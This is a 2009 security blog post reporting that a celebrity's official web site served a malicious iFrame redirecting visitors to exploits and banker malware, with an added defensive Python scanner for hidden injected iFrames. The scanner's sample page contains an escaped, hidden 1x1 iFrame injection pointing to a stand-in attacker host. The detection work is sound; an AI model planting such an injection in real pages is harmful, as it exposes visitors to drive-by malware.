January 14th, 2009

Paris Hilton’s official web site serving malware

Posted by Dancho Danchev @ 6:55 am

Categories: Hackers, Browsers, Botnets, Exploit code, Passwords, Anti Virus, Malware

Tags: Security, Web Malware, Paris Hilton, Banker Malware, Dancho Danchev

The official web site of Paris Hilton (parishilton.com) has been embedded with a malicious iFrame that automatically exposes visitors to client-side exploits and banker malware, according to researchers from ScanSafe. Closer analysis indicates the site was infected on Thursday, January 8th, making it the latest legitimate site whose outdated web application software led to its compromise.

Moreover, just as in previous related attacks, the compromise of Hilton's site is part of a bigger malware campaign affecting several thousand sites; it was not singled out as a target.

A JavaScript block embedded at the bottom of the site is actually an iFrame that used to point to the now-defunct you69tube .com/flvideo/.a/.t/index .php. Once the downloader served through it is executed, it attempts to fetch another binary from the same site, along with configuration files from several other sites, among them ManggaTv.com. Abusing legitimate infrastructure as the foundation for an entire malicious campaign is common practice among cybercriminals these days: in this campaign not only is the official web site of a popular celebrity used to acquire traffic, but another legitimate site serves as the drop zone for the banker malware's configuration file.
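The injection pattern described above (a script appended at the end of the page that writes a hidden iFrame pointing at an exploit kit) is easy to check for during triage of a compromised site. The scanner below is an added example written for this page; it is not code from the original post, from ScanSafe, or from the malware. The sample HTML, the domain names in it, and the `document.write(unescape(...))` obfuscation it decodes are constructed assumptions chosen to illustrate the technique, not artefacts recovered from parishilton.com.

```python
"""
Scan an HTML document for injected, hidden iFrames of the kind used to
redirect visitors to exploit kits. Two cases are covered:
  1. an <iframe> written directly into the HTML that is hidden or ~1x1, and
  2. an <iframe> hidden inside an inline <script> that decodes an escaped
     payload via document.write(unescape("...")), which is how such iFrames
     are commonly concealed from a casual look at the page source.
All sample data below is constructed for this example.
"""
import re
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE | re.DOTALL)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
WRITE_RE = re.compile(r"""document\.write\s*\(\s*unescape\s*\(\s*['"]([^'"]+)['"]""", re.IGNORECASE)


def js_unescape(s):
    """Emulate JavaScript's unescape(): %uXXXX -> UTF-16 unit, %XX -> Latin-1 char."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


def parse_attrs(tag):
    """Return a lower-cased dict of attributes from a single HTML start tag."""
    attrs = {}
    for m in ATTR_RE.finditer(tag):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs


def is_hidden(attrs):
    """True for display:none / visibility:hidden or a frame of 1px or less."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    try:
        w = int(re.sub(r"\D", "", attrs.get("width", "100")) or 0)
        h = int(re.sub(r"\D", "", attrs.get("height", "100")) or 0)
    except ValueError:
        return False
    return w <= 1 or h <= 1


def check_iframe(tag, site_host, origin):
    """Classify one iframe tag; a visible off-site embed alone is not flagged."""
    attrs = parse_attrs(tag)
    src = attrs.get("src", "")
    host = urlparse(src).hostname or site_host  # relative src stays on-site
    reasons = []
    if is_hidden(attrs):
        reasons.append("hidden or 1x1")
    if host != site_host:
        reasons.append("off-site src")
    if origin != "static html":
        reasons.append("written by obfuscated script")
    if "hidden or 1x1" in reasons or "written by obfuscated script" in reasons:
        return [{"src": src, "origin": origin, "reasons": reasons}]
    return []


def scan(html, site_host, tail_chars=2000):
    """Return a list of findings for iframes in the HTML and in decoded document.write payloads."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        findings.extend(check_iframe(m.group(0), site_host, "static html"))
    for sm in SCRIPT_RE.finditer(html):
        near_end = sm.start() >= len(html) - tail_chars
        origin = "script near end of page" if near_end else "script"
        for wm in WRITE_RE.finditer(sm.group(1)):
            for im in IFRAME_RE.finditer(js_unescape(wm.group(1))):
                findings.extend(check_iframe(im.group(0), site_host, origin))
    return findings


# Constructed sample: one legitimate video embed, one injected footer script
# that writes a 1x1 hidden iframe to an attacker-controlled host.
SAMPLE_HTML = """<html><body>
<h1>Fan club</h1>
<iframe src="https://player.example-cdn.test/embed/123" width="640" height="360"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fevil.example.test%2Fflvideo%2Findex.php%22%20width%3D%221%22%20height%3D%221%22%20style%3D%22visibility%3Ahidden%22%3E%3C%2Fiframe%3E'))</script>
</body></html>"""

if __name__ == "__main__":
    for f in scan(SAMPLE_HTML, "fanclub.example.test"):
        print(f"{f['src']}  [{f['origin']}]  {', '.join(f['reasons'])}")
```

Run against a mirrored copy of the site (e.g. the output of `curl -s` saved to disk) with `site_host` set to the site's own hostname. The visible 640x360 embed is left alone because off-site iframes are normal for video players; the decoded footer iframe is reported because it is both 1x1/hidden and produced by an escaped `document.write` payload. Other concealment tricks (`String.fromCharCode`, `eval` chains, CSS positioning off-screen) would need additional decoders in `scan`.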

Consider the attackers' logic here. December's massive SQL injection attack, which turned thousands of Chinese web sites into infection vectors serving the IE XML parsing zero day, illustrates the "long tail of SQL-injected sites" approach as opposed to targeted attacks against high-profile sites. The reasoning is that thousands of compromised sites not only bring in more traffic in aggregate than a single high-profile one, but also that a campaign lives longer when it is diversified across many sites rather than concentrated on one high-profile site, whatever traffic that site alone would bring.

For the time being the malicious iFrame has been removed, and the malware campaign is in a cover-up phase. Or so they wish.

Dancho Danchev is an independent security consultant and cyber threats analyst, with extensive experience in open source intelligence gathering, malware and E-crime incident response. Dancho is also involved in business development, marketing research and competitive intelligence as an independent contractor. He's been an active security blogger since 2007, and maintains a popular security blog sharing real-time threats intelligence data with the rest of the community on a daily basis.
  • Talkback
Confucius say:
You go to Paris site, you get a parisite. happy

Thank you. I'm here till Thursday. Try the veal.... (Read the rest)
Posted by: MGP2 on 01/14/09
The URI to TrackBack this entry is:
http://blogs.zdnet.com/security/wp-trackback.php?p=2383

advertisement

Recent Entries

advertisement
Click Here

Archives

ZDNet Blogs

LTE vs. WiMax

  • Even with WiMax services launched in both Portland, Ore. and Baltimore, Md., some pundits claim victory for the competing and heavily backed 4G broadband wireless standard, LTE (Long Term Evolution), which is, at best, a year away from deployment.
  • These days, many view this as more of a rivalry than a battle, and expect to see both technologies to evolve concurrently. Jason Hiner, Editor in Chief of TechRepublic, recently said, “It’s very likely that WiMax will drive down the cost of mobile broadband and force the other cellular carriers to become more open in their policies...”
  • Which of these standards will win national supremacy? Or is taking sides meaningless? Add your POV at TechRepublic.
advertisement
Click Here